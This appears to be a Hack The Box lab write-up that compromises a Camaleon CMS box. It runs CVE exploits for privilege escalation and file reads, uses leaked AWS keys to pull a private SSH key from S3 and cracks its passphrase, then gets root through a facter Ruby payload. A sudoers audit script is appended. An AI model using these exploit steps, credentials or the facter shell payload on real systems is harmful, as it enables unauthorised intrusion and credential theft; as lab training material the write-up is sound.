Notes from one HTB lab exercise
[I] Information gathering

This IP has two open ports:
1. Port 22 is open, running SSH;
2. Port 80 is open, running HTTP.
So try connecting to http://10.129.61.148/

The response is a 302 redirecting to http://facts.htb/. The homepage has nothing useful, so try brute-forcing routes.
gobuster dir -u http://facts.htb/ -w /snap/seclists/1214/Discovery/Web-Content/common.txt -t 100 --exclude-length 11110-11140
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://facts.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /snap/seclists/1214/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] Exclude Length: 11125,11130,11112,11119,11120,11129,11137,11115,11117,11126,11123,11140,11111,11116,11122,11110,11131,11127,11128,11134,11113,11114,11121,11133,11135,11136,11138,11139,11118,11124,11132
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/admin.cgi (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/admin.php (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/admin.pl (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/robots.txt (Status: 200) [Size: 99]
/sitemap.gz (Status: 500) [Size: 7918]
/sitemap (Status: 200) [Size: 3508]
/sitemap.xml (Status: 200) [Size: 3508]
/welcome (Status: 200) [Size: 11966]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished    # only the key entries are listed
===============================================================
A login route, /admin/login, is visible, and it has a registration entry point.
[II] Site privilege escalation
First tried weak-password brute forcing on admin, with no result;
so just register a throwaway account:
F / 123123
After logging in, gather information from the pages.

It turns out to be a CMS called Camaleon, Version 2.9.0. Camaleon has a privilege escalation vulnerability, CVE-2025-2304. Since the pages give no other information, I went straight to the exploit for this CVE to attempt privilege escalation.
python3 CVE-2025-2304.py -u http://facts.htb/ -U F -P 123123 --newpass 123123
[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+]Login confirmed User ID: 6 Current User Role: client
[+]Loading PPRIVILEGE ESCALATION User ID: 6 Updated User Role: admin
[+]Reverting User Role
Privilege escalation succeeded.

[III] Reaching the internal network
After a second round of information gathering, I found this page

It turns out that files uploaded by site users are stored in AWS S3, and the page also gives all the AWS S3 details, so here I try connecting with aws.
aws configure
AWS Access Key ID [****************None]: AKIAA514B10D39766779
AWS Secret Access Key [****************None]: bhckFDh3QgtouMvEA7gK369VO6KkJsCHrc00HR9Q
Default region name [None]: us-east-1
Default output format [None]:
=======================================================================================
aws --endpoint-url http://facts.htb:54321/ s3 ls
2025-09-11 20:06:52 internal
2025-09-11 20:06:52 randomfacts
Two S3 buckets are visible, and s3://internal/.ssh/ contains an id_ed25519, which now needs to be extracted. The site serves files from the randomfacts bucket, for example http://facts.htb/randomfacts/thumb/animalejected-png.png, so I try using aws to cp id_ed25519 to s3://randomfacts/thumb/id.txt.
aws --endpoint-url http://facts.htb:54321/ s3 cp s3://internal/.ssh/id_ed25519 s3://randomfacts/thumb/id.txt
copy: s3://internal/.ssh/id_ed25519 to s3://randomfacts/thumb/id.txt
Then visiting http://facts.htb/randomfacts/thumb/id.txt downloads id.txt, which gives the SSH login key.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCVTblg0rxxRP3AIwSs6EaXAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIJF26NNgkw+9juA7Gqi2XJoYjY+0NWyX78QPQu4YKE0mAAAAoO/yPQcQPgcoSDhniDY47ky6myp8870thalViS2S+ABRW07PE6/xV8zScKvGcjmq4isr9b+e6MZZQm2uVvTpF2PV1v2vTyyayQFr+Dw7Z67PqqmzuEgV0RDEQrfbJJyMlNP3AgNCW/0bA4oIiHAqhWI3fxQWY0Jr/Ndo/mu0n4alEoTLW49frfU4p4WrU9n/xtoDZQL65ImtSoiFf6q/1f4=
-----END OPENSSH PRIVATE KEY-----
The key's passphrase then needs to be cracked.
cd ~
nano id_ed25519    # paste the key in
# ssh is strict about key file permissions, so chmod id_ed25519
chmod 600 id_ed25519
ssh2john id_ed25519 > hash.txt    # convert to a john hash
cat hash.txt
id_ed25519:$sshng$6$16$954db960d2bc7144fdc02304ace84697$290$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$24$130
======================================================================================
john --format=SSH hash.txt --wordlist=~/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [MD5/bcrypt-pbkdf/[3]DES/AES 32/64])
Cracked 1 password hash (is in /home/fortuneee/john/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)
======================================================================================
john --show hash.txt
id_ed25519:dragonballz
The passphrase is cracked, so the next step is the SSH connection. But I don't yet know which usernames exist, so I first need to read /etc/passwd. For that I use Camaleon's other vulnerability, an arbitrary file read, CVE-2024-46987.
python3 CVE-2024-46987.py -u http://facts.htb/ -l F -p 123123 /etc/passwd
root:x:0:0:root:/root:/bin/bash
······    # only the key lines are listed here; the other users' shells are /usr/sbin/nologin, /bin/false and the like
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
Apart from root, only trivia and william have a /bin/bash shell.
Reading /home/trivia/.ssh/id_ed25519 and /home/william/.ssh/id_ed25519 shows that only trivia's SSH key is readable, and it is identical to the one obtained above, so the passphrase cracked above belongs to trivia. Then it is just the SSH connection.
ssh -i id_ed25519 trivia@facts.htb
Enter passphrase for key 'id_ed25519':
Last login: Tue May 12 09:06:00 UTC 2026 from 10.10.14.244 on ssh
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)
 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/pro
System information as of Tue May 12 01:06:42 PM UTC 2026
System load: 0.0
Usage of /: 73.3% of 7.28GB
Memory usage: 19%
Swap usage: 0%
Processes: 221
Users logged in: 1
IPv4 address for eth0: 10.129.61.148
IPv6 address for eth0: dead:beef::a0de:adff:fe60:9aaf
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
# successfully logged in: trivia@facts:~$
[IV] Internal privilege escalation
trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter
Here sudo -l is used to see which commands trivia may run with sudo. Checking william's later showed the same. While looking around I found the user flag in /home/william/user.txt: 56c71ceabde5a54451efe6ab758af75f. This shows that trivia can run /usr/bin/facter, and facter supports loading custom Ruby code, so we can use facter to run Ruby code and escalate privileges. Running sudo /usr/bin/facter --help shows that the facter version on this box supports --custom-dir, so it can be exploited directly; the principle behind the escalation is explained afterwards.
trivia@facts:~$ cd /tmp
trivia@facts:~$ cat > x.rb << 'EOF'
Facter.add(:pwned) do
  setcode do
    exec('/bin/sh')
  end
end
EOF
trivia@facts:~$ sudo /usr/bin/facter --custom-dir=/tmp pwned
# whoami
root    # privilege escalation succeeded here
# ls /root
minio-binaries ministack root.txt snap
# cat /root/root.txt
49ed8d1b599339bda221a132af3a8544
Got the root flag: 49ed8d1b599339bda221a132af3a8544
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Now to explain this privilege escalation:
[+] cd /tmp is to get into a writable directory; I need one to write the malicious Ruby file used for escalation.
[+] Write the malicious Ruby:
cat > x.rb << 'EOF'
Facter.add(:pwned) do
  setcode do
    exec('/bin/sh')    # get a shell
  end
end
EOF
[+] sudo /usr/bin/facter --custom-dir=/tmp pwned runs the malicious Ruby. It starts facter, makes facter scan the /tmp directory for the fact named pwned, which then executes exec('/bin/sh'), and finally a shell is obtained.
The role of --custom-dir here is to extend the paths facter loads facts from: by default it only reads directories such as /etc/puppetlabs/facter/facts.d/, and with --custom-dir=/tmp facter will also load facts from the given path.
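As an added defensive check, not part of the original write-up, the following Python audit parses sudoers rules and flags NOPASSWD entries that grant a binary able to load caller-supplied code (facter with --custom-dir, as above) or unrestricted ALL; the sudoers sample is constructed to mirror the `sudo -l` result, and the CODE_LOADING_BINARIES map is a starting point to extend.

```python
"""Audit sudoers for NOPASSWD rules that hand out code-loading binaries (constructed sample)."""
import re

# Binaries whose options load arbitrary code; extend this map for your environment.
CODE_LOADING_BINARIES = {
    "/usr/bin/facter": "--custom-dir loads Ruby fact files from a caller-chosen directory",
}

# Constructed sample mirroring the `sudo -l` output above (not the box's real file).
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass, use_pty
root    ALL=(ALL:ALL) ALL
trivia  ALL=(ALL) NOPASSWD: /usr/bin/facter
william ALL=(ALL) NOPASSWD: /usr/bin/facter
backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
%sudo   ALL=(ALL:ALL) ALL
"""

# user  host=(runas) [NOPASSWD:] command list
RULE_RE = re.compile(r"^(\S+)\s+\S+=\([^)]*\)\s*(NOPASSWD:)?\s*(.+)$")


def parse_sudoers(text):
    """Return (user, nopasswd, [command paths]) for every user specification line."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        user, nopasswd, cmds = m.groups()
        # Keep only the binary path; drop any arguments the rule pins.
        paths = [c.strip().split()[0] for c in cmds.split(",") if c.strip()]
        rules.append((user, nopasswd is not None, paths))
    return rules


def find_risky_rules(text):
    """Flag passwordless rules for ALL or for a known code-loading binary."""
    findings = []
    for user, nopasswd, paths in parse_sudoers(text):
        if not nopasswd:
            continue
        for path in paths:
            if path == "ALL":
                findings.append((user, path, "unrestricted root without a password"))
            elif path in CODE_LOADING_BINARIES:
                findings.append((user, path, CODE_LOADING_BINARIES[path]))
    return findings
```

Run find_risky_rules over the real /etc/sudoers and /etc/sudoers.d/* on a host; any hit on facter should be removed or replaced by a rule that pins the exact arguments, since NOPASSWD facter is equivalent to passwordless root.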
Some of this information may be out of date.